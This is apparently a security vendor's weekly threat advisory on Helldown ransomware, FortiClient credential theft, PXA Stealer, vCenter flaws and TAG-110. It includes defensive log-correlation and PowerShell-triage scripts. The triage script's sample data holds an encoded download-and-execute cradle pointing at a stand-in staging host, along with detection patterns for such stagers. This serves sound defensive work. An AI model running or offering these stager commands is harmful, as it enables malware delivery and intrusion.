Helldown Ransomware Exploits Zyxel VPN Flaw to Target Corporate Networks
- SISA Weekly Threat Watch -
In the past week, several critical threats have been reported across multiple platforms. The Helldown ransomware is exploiting a Zyxel firewall vulnerability (CVE-2024-42057) to steal data and encrypt devices at small and medium-sized enterprises, and two critical VMware vCenter Server flaws (CVE-2024-38812 and CVE-2024-38813) are being actively exploited for remote code execution and privilege escalation. TAG-110, a Russia-linked espionage group, has been observed deploying its HATVIBE and CHERRYSPY malware against targets in Central Asia and Europe. BrazenBamboo, a group linked to China’s APT41, is abusing a zero-day in Fortinet’s FortiClient to harvest VPN credentials and other sensitive data. PXA Stealer, a Python-based information stealer, has hit educational institutions and government bodies in Europe and Asia, delivered through phishing emails and PowerShell scripts. Together, these developments underscore the need for organizations to stay vigilant and apply security updates promptly.
SISA Weekly Threat Watch, our weekly feature, brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide in the past week. These recurring, actionable threat advisories also provide information and recommendations to help security teams take appropriate action against the latest critical threats.
1. Helldown Ransomware Exploits Zyxel VPN Flaw to Target Corporate Networks
Helldown ransomware exploits vulnerabilities in Zyxel firewalls, in particular CVE-2024-42057, a command injection flaw in the IPSec VPN feature of Zyxel’s ZLD firmware, to breach corporate networks, exfiltrate data, and encrypt devices. Targeting small and medium-sized firms, the attackers gain initial access through the firewall’s IPSec VPN, create their own accounts on the device, and disable defenses before moving laterally across the network. The group’s encryptors are basic but effective, and have disrupted operations at victims in the U.S. and Europe, some of whom have paid ransoms. Researchers assess that the group relies on n-day or privately held exploits against unpatched, MIPS-based Zyxel devices.
Recommendations to mitigate this threat include updating Zyxel firewalls to ZLD firmware 5.39 or later, which fixes CVE-2024-42057; monitoring network traffic for suspicious VPN connections; and reviewing firewall logs for unusual administrative activity, particularly newly created accounts and disabled security rules. Multi-factor authentication on VPN access and tightly restricted privileged access limit the damage any single compromised account can do, and endpoint protection capable of detecting ransomware behaviour adds a further layer. Regular audits and phishing-awareness training for employees further strengthen defenses. These measures are crucial while Helldown’s campaign is ongoing.
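One way to turn the advice to review firewall logs for unusual administrative activity into a concrete check, as an added example that is not SISA’s or Zyxel’s code: the script below correlates account-creation events with VPN logins and rule changes by the same new account. The log lines and their format are constructed for this example (a real Zyxel device logs differently, so the regexes would need adapting), and the default one-hour window is an assumption to tune for your environment.

```python
"""Correlate firewall admin-account creation with follow-on VPN logins.

Added example (not SISA's or Zyxel's code). The log lines are constructed,
syslog-style records invented for this example; they are NOT Zyxel's real
log format, so the regexes below would need adapting to a real device.
"""
import re
from datetime import datetime, timedelta

# Constructed sample logs: one account created at 02:13 and used for a VPN
# login two minutes later, then used to disable a rule; plus two normal users.
SAMPLE_LOGS = """\
2024-11-12T02:13:04Z fw01 user: admin created account 'support_tmp' (type: admin)
2024-11-12T02:14:51Z fw01 vpn: SSL VPN tunnel up for user 'support_tmp' from 203.0.113.45
2024-11-12T02:16:10Z fw01 config: rule 'block-smb-wan' disabled by 'support_tmp'
2024-11-12T09:00:00Z fw01 user: admin created account 'jdoe' (type: user)
2024-11-13T08:30:00Z fw01 vpn: IPSec tunnel up for user 'jdoe' from 198.51.100.7
2024-11-13T08:31:00Z fw01 vpn: SSL VPN tunnel up for user 'alice' from 198.51.100.9
"""

CREATE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) user: (?P<actor>\S+) created account "
    r"'(?P<account>[^']+)' \(type: (?P<type>\w+)\)$"
)
VPN_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) vpn: (?P<proto>SSL VPN|IPSec) tunnel up "
    r"for user '(?P<account>[^']+)' from (?P<src>[\d.]+)$"
)
DISABLE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) config: rule '(?P<rule>[^']+)' "
    r"disabled by '(?P<account>[^']+)'$"
)


def parse_ts(text):
    """Parse the ISO-8601 UTC timestamp used by the sample lines."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")


def find_suspicious_accounts(log_text, window=timedelta(hours=1)):
    """Return findings for accounts that are created and then log in over
    VPN within `window`, or that disable a firewall rule at any later time.

    Logs are assumed to be in chronological order, so a creation event is
    always seen before the events that use the new account.
    """
    created = {}   # account -> (creation time, account type, creating actor)
    findings = []
    for line in log_text.splitlines():
        m = CREATE_RE.match(line)
        if m:
            created[m["account"]] = (parse_ts(m["ts"]), m["type"], m["actor"])
            continue

        m = VPN_RE.match(line)
        if m and m["account"] in created:
            t_created, acct_type, actor = created[m["account"]]
            age = parse_ts(m["ts"]) - t_created
            if timedelta(0) <= age <= window:
                findings.append({
                    "event": "vpn_login_after_creation",
                    "account": m["account"], "type": acct_type,
                    "created_by": actor, "proto": m["proto"], "src": m["src"],
                    "age_seconds": int(age.total_seconds()),
                })
            continue

        m = DISABLE_RE.match(line)
        if m and m["account"] in created:
            age = parse_ts(m["ts"]) - created[m["account"]][0]
            findings.append({
                "event": "rule_disabled_by_new_account",
                "account": m["account"], "rule": m["rule"],
                "age_seconds": int(age.total_seconds()),
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_accounts(SAMPLE_LOGS):
        print(finding)
```

With the default window only `support_tmp` is flagged (VPN login 107 seconds after creation, then a rule disabled); widening the window to a day also catches `jdoe`, so the window is a trade-off between noise and the slower "create today, use tomorrow" pattern.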
2. Cyber Espionage Warning: DEEPDATA Malware Leverages Fortinet VPN Vulnerability
BrazenBamboo, a sophisticated threat group linked to China’s APT41, has been exploiting a zero-day vulnerability in Fortinet’s FortiClient for Windows as part of DEEPDATA, its modular cyber-espionage framework. The flaw leaves VPN credentials in the FortiClient process memory after authentication, where a DEEPDATA plugin extracts them. The toolkit, which is connected to surveillance tools such as LightSpy, also targets messaging platforms and other sensitive data, posing a serious threat to organizations. Although the flaw was reported to Fortinet, no patch had been released at the time of writing.
Recommendations to mitigate this threat include blocking indicators of compromise (IoCs) associated with DEEPDATA, DEEPPOST, and LightSpy in firewalls, IDS/IPS, and SIEM systems, and keeping threat intelligence feeds current. Network segmentation and EDR tooling should be in place to detect unusual activity and malicious DLL injection. Enforcing multi-factor authentication (MFA) on VPN access limits the value of any credentials that are stolen, and employees should be trained to avoid phishing and untrusted downloads. Organizations should update incident response plans to cover threats like DEEPDATA and perform forensic analysis on compromised systems to support containment and recovery.
3. New Python-Based PXA Stealer Exploits Credentials Across Europe and Asia
A Vietnamese-speaking threat actor is conducting an information-stealing campaign using PXA Stealer, a Python-based malware targeting sensitive data such as online credentials, VPN/FTP client data, browser cookies, financial details, and gaming software information. The campaign has impacted government and educational institutions in Europe and Asia, with evidence linking the attacker to Vietnamese Telegram channels marketing tools for account theft. The malware leverages phishing emails, a Rust-based loader, and PowerShell scripts to bypass antivirus defenses and deploy the stealer.
Recommendations to mitigate this threat include deploying advanced email filtering to catch phishing attempts and educating users to recognise suspicious emails. Robust endpoint protection and regular system updates help blunt PowerShell-based attacks. Two-factor authentication (2FA) should protect critical accounts, and because the stealer reads browser cookie stores directly, active sessions for sensitive services should be revoked when a compromise is suspected. Monitoring logs for unusual PowerShell activity and for network traffic to suspicious domains helps identify breaches early. Compromised systems should be isolated promptly and a thorough incident analysis conducted to remove malware remnants and secure the affected accounts.
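The recommendation to watch for unusual PowerShell activity is easier to act on with a concrete triage rule. The following is an added example, not SISA’s or Cisco Talos’ code: it decodes `-EncodedCommand` arguments (base64 of UTF-16LE) and scores each record against a small set of stager indicators such as download cradles, hidden windows and Defender exclusions. The records are constructed for this example and only loosely resemble Windows Event ID 4688/4104 fields; the indicator list and the threshold are assumptions to extend for your environment.

```python
"""Triage PowerShell command lines / script blocks for stager-like behaviour.

Added example (not SISA's or Cisco Talos' code). The records below are
constructed for this example, loosely shaped like the fields of Windows
Event ID 4688 (process creation) and 4104 (script block logging); they are
not real captured events.
"""
import base64
import re

# Indicators commonly seen in PowerShell stagers that fetch and run a payload.
PATTERNS = {
    "download_cradle": re.compile(
        r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl)\b", re.I),
    "invoke_expression": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "bypass_policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded script from a -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Score one record: decode any encoded command, then match indicators
    against both the raw command line and the decoded script."""
    text = event["text"]
    decoded = decode_encoded_command(text)
    hits = set()
    if decoded is not None:
        hits.add("encoded_command")
        text = text + "\n" + decoded
    for name, rx in PATTERNS.items():
        if rx.search(text):
            hits.add(name)
    return {"record": event["id"], "hits": sorted(hits),
            "decoded": decoded, "score": len(hits)}


def triage(events, threshold=2):
    """Return scored records carrying at least `threshold` indicators."""
    return [r for r in map(score_event, events) if r["score"] >= threshold]


def encode_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry); 203.0.113.10 is a
# documentation address standing in for a staging server.
SAMPLE_EVENTS = [
    {"id": 1, "text": "powershell.exe -nop -w hidden -ep bypass -enc "
               + encode_ps("IEX (New-Object Net.WebClient)"
                           ".DownloadString('http://203.0.113.10/stage.ps1')")},
    {"id": 2, "text": "powershell.exe Get-ChildItem C:\\Users\\jdoe\\Documents"},
    {"id": 3, "text": "powershell.exe -c \"Add-MpPreference -ExclusionPath C:\\Users\\Public; "
               "[IO.File]::WriteAllBytes('C:\\Users\\Public\\ld.exe', "
               "[Convert]::FromBase64String($b))\""},
    {"id": 4, "text": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["record"], r["score"], r["hits"])
```

Scoring on the decoded script rather than only the raw command line is the important part: the encoded record 1 shows nothing suspicious beyond its switches until it is decoded, at which point the download cradle and `IEX` become visible and push it well past the threshold.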
4. VMware vCenter Server Vulnerabilities Actively Exploited, Updated Patches Released
Broadcom has confirmed active exploitation of two VMware vCenter Server vulnerabilities: CVE-2024-38812 (critical remote code execution, CVSS 9.8) and CVE-2024-38813 (privilege escalation, CVSS 7.5). Both affect VMware vSphere and VMware Cloud Foundation. CVE-2024-38812 is a heap overflow in vCenter’s DCE/RPC protocol implementation that an attacker with network access can trigger with a specially crafted packet to achieve remote code execution; CVE-2024-38813 lets an attacker with network access escalate privileges to root, again via a crafted packet. VMware first released patches in September 2024, but the fix for CVE-2024-38812 was incomplete, so updated patches followed in October 2024.
Recommendations include applying the latest VMware patches immediately, as no workarounds exist. Affected versions are VMware vCenter Server 7.0 and 8.0 and VMware Cloud Foundation 4.x and 5.x; the fixed releases are vCenter Server 7.0 U3t and 8.0 U3d (the earlier 7.0 U3s and 8.0 U3b builds from September do not fully address CVE-2024-38812), with corresponding asynchronous patches for Cloud Foundation. Administrators should monitor systems for unusual network activity and deploy these updates promptly to prevent exploitation. Broadcom’s advisory (VMSA-2024-0019) and its supplemental guidance cover patch application and related issues.
5. TAG-110 Launches Sophisticated Attacks Using HATVIBE and CHERRYSPY
Threat actors with Russian ties, tracked as TAG-110, have conducted cyber-espionage campaigns since at least 2021 against government entities, human rights groups, and educational institutions in Central Asia, East Asia, and Europe. Using the custom tools HATVIBE (an HTML Application loader) and CHERRYSPY (a Python-based backdoor), the group gains access through phishing emails and by exploiting vulnerable internet-facing services, then monitors activity and exfiltrates sensitive data. The campaigns align with Russia’s geopolitical objectives, including its efforts to retain influence over post-Soviet states and to destabilize NATO-aligned nations.
Researchers recommend deploying intrusion detection and prevention systems (IDS/IPS) and monitoring for indicators of compromise (IoCs), including the group’s known C2 domains and IP addresses. Prompt patching of vulnerabilities is crucial, especially CVE-2024-23692 in Rejetto HTTP File Server, which TAG-110 has exploited for initial access. Organizations should also deploy robust endpoint detection and response (EDR), enforce multi-factor authentication (MFA), and provide phishing-awareness training. Sharing IoCs with regional cybersecurity agencies strengthens collective defenses against TAG-110’s persistent, strategically driven attacks.
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.